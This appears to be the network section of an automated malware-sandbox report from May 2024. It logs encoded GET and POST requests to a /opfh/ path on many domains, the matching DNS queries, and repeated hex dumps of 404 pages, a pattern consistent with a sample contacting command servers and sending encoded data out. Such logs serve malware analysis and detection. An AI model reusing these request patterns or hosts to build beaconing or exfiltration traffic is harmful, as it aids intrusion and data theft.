            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ziontool.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.busypro.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.performacetoyota.caConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.pricekaboom.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.drapples.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.autonomyai.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.pharmacielorraine.frConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficHTTP traffic detected: GET /opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.y94hr.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
            Source: global trafficDNS traffic detected: DNS query: www.batchscraper.com
            Source: global trafficDNS traffic detected: DNS query: www.auronhouse.com
            Source: global trafficDNS traffic detected: DNS query: www.ukscan.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.swordshoop.ca
            Source: global trafficDNS traffic detected: DNS query: www.fruitique.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.gamemaster.at
            Source: global trafficDNS traffic detected: DNS query: www.annahaywardva.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.ziontool.xyz
            Source: global trafficDNS traffic detected: DNS query: www.busypro.net
            Source: global trafficDNS traffic detected: DNS query: www.performacetoyota.ca
            Source: global trafficDNS traffic detected: DNS query: www.digishieldu.online
            Source: global trafficDNS traffic detected: DNS query: www.pricekaboom.com
            Source: global trafficDNS traffic detected: DNS query: www.drapples.club
            Source: global trafficDNS traffic detected: DNS query: www.autonomyai.xyz
            Source: global trafficDNS traffic detected: DNS query: www.pharmacielorraine.fr
            Source: global trafficDNS traffic detected: DNS query: www.y94hr.top
            Source: unknownHTTP traffic detected: POST /opfh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.auronhouse.comOrigin: http://www.auronhouse.comReferer: http://www.auronhouse.com/opfh/Cache-Control: max-age=0Content-Length: 218Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 71 58 45 30 64 6d 35 39 2b 4c 45 42 64 72 43 6c 41 5a 4c 5a 39 35 56 52 69 30 55 68 4f 46 42 43 7a 76 6c 35 70 53 56 58 49 51 4a 2b 76 44 55 4d 32 4c 62 7a 61 5a 4d 64 44 66 4b 46 2f 4f 4a 38 6c 33 5a 69 55 49 66 56 31 6f 73 73 54 37 49 61 48 78 4f 4c 51 31 6d 57 6b 78 79 36 67 39 6b 72 75 49 44 39 5a 79 4f 65 52 72 2f 74 72 76 34 43 65 72 65 42 67 78 72 5a 68 74 72 38 49 55 43 2f 4f 35 58 35 6d 4d 51 33 53 67 59 58 6c 43 2b 31 36 6d 37 46 58 75 42 6a 7a 5a 6c 52 35 62 5a 31 70 36 45 56 74 62 45 35 74 78 38 79 6f 73 54 72 65 38 63 35 52 55 2f 6a 67 66 4e 50 43 34 78 33 44 46 66 69 57 41 3d 3d Data Ascii: R40L6=2UG677uIDGFYqXE0dm59+LEBdrClAZLZ95VRi0UhOFBCzvl5pSVXIQJ+vDUM2LbzaZMdDfKF/OJ8l3ZiUIfV1ossT7IaHxOLQ1mWkxy6g9kruID9ZyOeRr/trv4CereBgxrZhtr8IUC/O5X5mMQ3SgYXlC+16m7FXuBjzZlR5bZ1p6EVtbE5tx8yosTre8c5RU/jgfNPC4x3DFfiWA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:49 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:51 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:54 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 